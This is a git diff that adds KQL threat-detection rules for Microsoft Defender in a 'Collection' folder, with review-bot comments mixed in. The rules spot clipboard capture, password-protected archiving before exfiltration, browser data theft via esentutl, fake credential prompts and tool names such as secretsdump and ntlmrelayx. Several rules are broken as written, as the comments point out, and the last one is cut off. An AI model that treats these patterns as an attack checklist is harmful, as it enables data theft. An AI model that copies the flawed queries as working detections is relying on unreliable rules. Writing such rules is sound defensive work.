+// Title: Audio Capture via SoundRecorder
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detect attacker collecting audio via SoundRecorder application.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+// - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/automated_collection_command_prompt.kql b/KQL/rules/Collection/automated_collection_command_prompt.kql
new file mode 100644
index 00000000..4bbf1e5c
--- /dev/null
+++ b/KQL/rules/Collection/automated_collection_command_prompt.kql
@@ -0,0 +1,10 @@
+// Title: Automated Collection Command Prompt
+// Author: frack113
+// Date: 2021-07-28
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119, attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
new file mode 100644
index 00000000..62d56887
--- /dev/null
+++ b/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql
@@ -0,0 +1,14 @@
+// Title: Clipboard Collection with Xclip Tool
+// Author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: low
+// Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
+Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+// False Positives:
+// - Legitimate usage of xclip tools.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-sel" and ProcessCommandLine contains "clip" and ProcessCommandLine contains "-o") and FolderPath contains "xclip"
\ No newline at end of file
diff --git a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql
new file mode 100644
index 00000000..6a388610
--- /dev/null
+++ b/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql
@@ -0,0 +1,12 @@
+// Title: Clipboard Data Collection Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible collection of data from the clipboard via execution of the osascript binary
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "clipboard"
\ No newline at end of file
diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
new file mode 100644
index 00000000..7e685676
--- /dev/null
+++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
@@ -0,0 +1,12 @@
+// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate activity is expected since compressing files with a password is common.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p"
\ No newline at end of file
diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
new file mode 100644
index 00000000..e2d30117
--- /dev/null
+++ b/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
@@ -0,0 +1,10 @@
+// Title: Compress Data and Lock With Password for Exfiltration With WINZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe")
\ No newline at end of file
diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
new file mode 100644
index 00000000..8bbba7e0
--- /dev/null
+++ b/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
@@ -0,0 +1,14 @@
+// Title: Compressed File Creation Via Tar.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to create a compressed file.
+Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
new file mode 100644
index 00000000..eb7cef68
--- /dev/null
+++ b/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
@@ -0,0 +1,14 @@
+// Title: Compressed File Extraction Via Tar.EXE
+// Author: AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to extract compressed file.
+Adversaries may abuse various utilities in order to decompress data to avoid detection.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql
new file mode 100644
index 00000000..ef212c65
--- /dev/null
+++ b/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql
@@ -0,0 +1,10 @@
+// Title: Data Copied To Clipboard Via Clip.EXE
+// Author: frack113
+// Date: 2021-07-27
+// Level: low
+// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
+| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/esentutl_steals_browser_information.kql b/KQL/rules/Collection/esentutl_steals_browser_information.kql
new file mode 100644
index 00000000..e4a5393d
--- /dev/null
+++ b/KQL/rules/Collection/esentutl_steals_browser_information.kql
@@ -0,0 +1,12 @@
+// Title: Esentutl Steals Browser Information
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r" or ProcessCommandLine contains "–r" or ProcessCommandLine contains "—r" or ProcessCommandLine contains "―r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache"
\ No newline at end of file
diff --git a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql
new file mode 100644
index 00000000..60d93348
--- /dev/null
+++ b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql
@@ -0,0 +1,12 @@
+// Title: Files Added To An Archive Using Rar.EXE
+// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Highly likely if rar is a default archiver in the monitored environment.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
new file mode 100644
index 00000000..a5bf0696
--- /dev/null
+++ b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2021-07-20
+// Level: medium
+// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
+An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1074.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Collection/gui_input_capture_macos.kql b/KQL/rules/Collection/gui_input_capture_macos.kql
new file mode 100644
index 00000000..fad2568a
--- /dev/null
+++ b/KQL/rules/Collection/gui_input_capture_macos.kql
@@ -0,0 +1,12 @@
+// Title: GUI Input Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use system dialog prompts to capture user credentials
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1056.002
+// False Positives:
+// - Legitimate administration tools and activities
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/sbin/osascript" and (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock")
\ No newline at end of file
diff --git a/KQL/rules/Collection/hacktool_adcspwn_execution.kql b/KQL/rules/Collection/hacktool_adcspwn_execution.kql
new file mode 100644
index 00000000..95eee526
--- /dev/null
+++ b/KQL/rules/Collection/hacktool_adcspwn_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - ADCSPwn Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-31
+// Level: high
+// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port "
\ No newline at end of file
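Review bot: `FolderPath =~ "/usr/sbin/osascript"` pins an exact absolute path, and on the macOS builds I have seen `osascript` lives at `/usr/bin/osascript`, so this predicate may never match — please confirm against real Defender for macOS `DeviceProcessEvents` before shipping. `FolderPath endswith "/osascript"` would cover either location and is still tight enough given the remaining `display`/`dialog`/`answer` command-line terms. The clipboard osascript rule earlier in this patch matches on `ProcessCommandLine contains "osascript"` instead; the two rules should agree on how the binary is identified.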
diff --git a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql
new file mode 100644
index 00000000..6d70bb10
--- /dev/null
+++ b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Impacket Tools Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: high
+// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Legitimate use of the impacket tools
+
+DeviceProcessEvents
+| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or 
FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe")
\ No newline at end of file
diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
new file mode 100644
index 00000000..f6041c74
--- /dev/null
+++ b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql
@@ -0,0 +1,14 @@
+// Title: Periodic Backup For System Registry Hives Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-01
+// Level: medium
+// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
+Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
+
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate need for RegBack feature by administrators.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup"
\ No newline at end of file
diff --git a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql
new file mode 100644
index 00000000..2e442414
--- /dev/null
+++ b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql
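Review bot: In the "Periodic Backup For System Registry Hives Enabled" hunk, `RegistryValueData =~ "DWORD (0x00000001)"` is Sysmon's rendering of a DWORD; in Defender's `DeviceRegistryEvents` the data is stored as the plain value string (`"1"` here) and the value name is carried in `RegistryValueName`, not appended to `RegistryKey`, so this `| where` will not match as written — please confirm against a sample event from a host where the value was set. The filter I would expect is `| where ActionType == "RegistryValueSet" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager" and RegistryValueName =~ "EnablePeriodicBackup" and RegistryValueData == "1"`. If the converter maps Sigma `TargetObject`/`Details` this way generally, the other registry-based rules in the series will need the same split.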
@@ -0,0 +1,12 @@
+// Title: Potential SMB Relay Attack Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: critical
+// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+// - Legitimate files with these rare hacktool names
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql
new file mode 100644
index 00000000..102b810c
--- /dev/null
+++ b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Activity Using SeCEdit
+// Author: Janantha Marasinghe
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
+// False Positives:
+// - Legitimate administrative use
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql
new file mode 100644
index 00000000..45d6cab7
--- /dev/null
+++ b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Get-Clipboard Cmdlet Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-Clipboard"
\ No newline at end of file
diff --git a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql
new file mode 100644
index 00000000..0c3172f6
--- /dev/null
+++ b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql
@@ -0,0 +1,10 @@
+// Title: Processes Accessing the Microphone and Webcam
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-07
+// Level: medium
+// Description: Potential adversaries accessing the microphone and webcam in an endpoint.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged"
\ No newline at end of file
diff --git a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql
new file mode 100644
index 00000000..78eedc5e
--- /dev/null
+++ b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql
@@ -0,0 +1,13 @@
+// Title: Rar Usage with Password and Compression Level
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: high
+// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of Winrar command line version
+// - Other command line tools, that use these flags
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ")
\ No newline at end of file
diff --git a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql
new file mode 100644
index 00000000..65fad7a0
--- /dev/null
+++ b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql
@@ -0,0 +1,10 @@
+// Title: Recon Information for Export with Command Prompt
+// Author: frack113
+// Date: 2021-07-30
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\")
\ No newline at end of file
diff --git a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql
new file mode 100644
index 00000000..1ddc1555
--- /dev/null
+++ b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Screen Capture Activity Via Psr.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-12
+// Level: medium
+// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe"
\ No newline at end of file
diff --git a/KQL/rules/Collection/screen_capture_macos.kql b/KQL/rules/Collection/screen_capture_macos.kql
new file mode 100644
index 00000000..e12abbe0
--- /dev/null
+++ b/KQL/rules/Collection/screen_capture_macos.kql
@@ -0,0 +1,12 @@
+// Title: Screen Capture - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Detects attempts to use screencapture to collect macOS screenshots
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate user activity taking screenshots
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/sbin/screencapture"
\ No newline at end of file
diff --git a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql
new file mode 100644
index 00000000..df63d384
--- /dev/null
+++ b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Camera and Microphone Access
+// Author: Den Iuzvyk
+// Date: 2020-06-07
+// Level: high
+// Description: Detects Processes accessing the camera and microphone from suspicious folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1125, attack.t1123
+// False Positives:
+// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#")
\ No newline at end of file
diff --git a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql
new file mode 100644
index 00000000..800c1fea
--- /dev/null
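Review bot: `RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*"` carries a literal `*` into the string, and KQL `endswith` has no wildcard, so this clause can never be true and the rule matches nothing. A Sigma trailing wildcard translates to a substring test here, i.e. `RegistryKey contains "\\CapabilityAccessManager\\ConsentStore\\"`, which combined with the existing `contains "\\NonPackaged"` keeps the intended scope. The `:#Windows#Temp#`-style terms look at the NonPackaged subkey name, where the app path is stored with `#` in place of the separator, so they are fine once the first clause is fixed; confirm against a real DeviceRegistryEvents record that this is the form MDE records.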
+++ b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql 
@@ -0,0 +1,12 @@
+// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no")))
\ No newline at end of file
diff --git a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql
new file mode 100644
index 00000000..1fde3264
--- /dev/null
+++ b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql
@@ -0,0 +1,10 @@
+// Title: Veeam Backup Database Suspicious Query
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: medium
+// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+
+DeviceProcessEvents
